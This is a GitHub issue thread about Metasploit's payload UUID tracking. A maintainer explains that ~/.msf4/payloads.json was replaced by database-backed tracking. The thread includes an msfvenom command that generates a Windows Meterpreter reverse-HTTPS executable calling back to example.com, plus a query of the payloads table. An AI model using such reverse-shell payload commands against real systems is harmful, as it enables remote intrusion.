### ISSUE TITLE
msfconsole/msfvenom are not creating nor feeding ~/.msf4/payloads.json when using payload uuid tracking

### ISSUE THREAD

**Issue by NeodymiumFerBore** [rapid7/metasploit-framework#14158]
## Steps to reproduce

1. Launch image `metasploit-framework:latest` from dockerhub (metasploitframework/metasploit-framework), today=2020-09-20, image ID = `0946d77f5dbd`
2. Version = `6.0.8-dev`
3. Run bash from within `msfconsole`
4. Generate payload with `msfvenom`

```
./msfvenom --version
msfvenom: version unknown

./msfvenom -p windows/meterpreter/reverse_https \
    LHOST=example.com LPORT=4444 \
    PayloadUUIDTracking=true PayloadUUIDName=EmailCampaign20150101 \
    -f exe -o /data/payloads/payload.exe
```
5. `/home/msf/.msf4/payloads.json` is not created
```
touch /home/msf/.msf4/payloads.json
!./msfvenom
```
6. `~/.msf4/payloads.json` still empty

7. Also tried other payloads such as `windows/meterpreter/reverse_tcp`, `windows/meterpreter/reverse_tcp_uuid`, stageless `windows/meterpreter_reverse_https`. It didn't change the behavior.

8. Also tried with option `PayloadUUIDSeed`, didn't change the behavior.

9. Also tried on version `5.0.101-dev` which is packed in kali 2020.3 (from repo, up to date). Same behavior.

10. Also tried the command `generate` within `msfconsole`, by "using" the payload and setting the UUID tracking options. Same behavior (payload generated, `~/.msf4/payloads.json` not created).

The payload is correctly generated though, but can't use uuid tracking. No error message during the payload generation.

## Were you following a specific guide/tutorial or reading documentation?

Yes:
- [Meterpreter-Paranoid-Mode](https://github.com/rapid7/metasploit-framework/wiki/Meterpreter-Paranoid-Mode)
- [Payload-UUID](https://github.com/rapid7/metasploit-framework/wiki/Payload-UUID)

## Expected behavior

`~/.msf4/payloads.json` should be created/populated with relevant information.

## Current behavior

`~/.msf4/payloads.json` is not created. If it exists (empty file), it is not fed with new information.

### Metasploit version

`Framework: 6.0.8-dev`
`Console  : 6.0.8-dev`

Docker image: `0946d77f5dbd`

```
./msfvenom --version
msfvenom: version unknown
```

Source of acquisition:
`docker pull metasploitframework/metasploit-framework`

## Additional Information

I am not using any database (`db_status: postgresql selected, no connection`). Maybe I missed that UUID tracking works only with a db and not via a file anymore? If this is the case, then this issue is not a bug but a feature request. Please let us run a standalone listener without any db :-) )

If you need any additional information, please let me know.

**Comment by adfoster-r7** [comment]
@NeodymiumFerBore It looks like `~/.msf4/payloads.json` has been removed, and the payload tracking has now been migrated to use the Metasploit data service:

>  Between PR #10675 and PR #11532, Erin Bleiweiss and Matthew Kienow shifted Metasploit's payload UUID tracking mechanism from a local file, `~/.msf4/payloads.json`, to the Metasploit data service, allowing users to store and track UUID payloads in a local or remote database.

Full details can be found here:
https://blog.rapid7.com/2019/03/08/metasploit-wrap-up-7/

As far as I understand it, you will need the database running for this functionality to work as expected. I'll see if any of the documentation you linked could be updated / improved.

Potentially we could make this more clear to the user, as at the minute msfvenom will silently return and skip the payload tracking functionality entirely from what I can see:

https://github.com/rapid7/metasploit-framework/blob/8a46b2b1255faaecd6f3f858b2ac1f3a6cb17fd0/lib/msf/core/payload/uuid/options.rb#L110-L128

**Comment by adfoster-r7** [comment]
It looks like the following PR introduced these guard clauses to handle some edge cases https://github.com/rapid7/metasploit-framework/pull/11644 with payload tracking when a database wasn't present

**Comment by NeodymiumFerBore** [comment]
Ah! Thank you for your feedback !

And yes indeed, I took a look into the msf db (version 5, not the one from the docker image) and there are my payloads ! Oops. So, no way to use a file on a standalone Metasploit instance :( 

```
msf=# SELECT * FROM payloads;

 id |                   name                    |       uuid       | uuid_mask | timestamp  | arch | platform | urls | description | raw_payload | raw_payload_hash | build_status | build_opts |         created_at         |         updated_at         
----+-------------------------------------------+------------------+-----------+------------+------+----------+------+-------------+-------------+------------------+--------------+------------+----------------------------+----------------------------
  1 |                                           | 4444444444444444 |           | 1600579126 | x86  | windows  |      |             |             |                  |              |            | 2020-09-20 05:18:46.162391 | 2020-09-20 05:18:46.162391
  2 | ParanoidStagelessRevHttps_10.0.0.100_4443 | b1c7c09fc4b64dd5 |           | 1600615928 | x86  | windows  |      |             |             |                  |              |            | 2020-09-20 15:32:08.159393 | 2020-09-20 15:32:08.159393
(2 rows)
```

I see multiple fields, such as `raw_payload`, `description`, `build_opts`, which are very interesting, but empty!

Is there an in-depth documentation about metasploit db usage? Such as user management to limit access to workspaces, payload management to reuse the exactly same config, loading a payload from the db, setting a payload description, etc? Or is it for the Pro version only? I never really used the db before, and the only docs I find are very basic.

If you have such documentation, can you please link it?

Thank you!
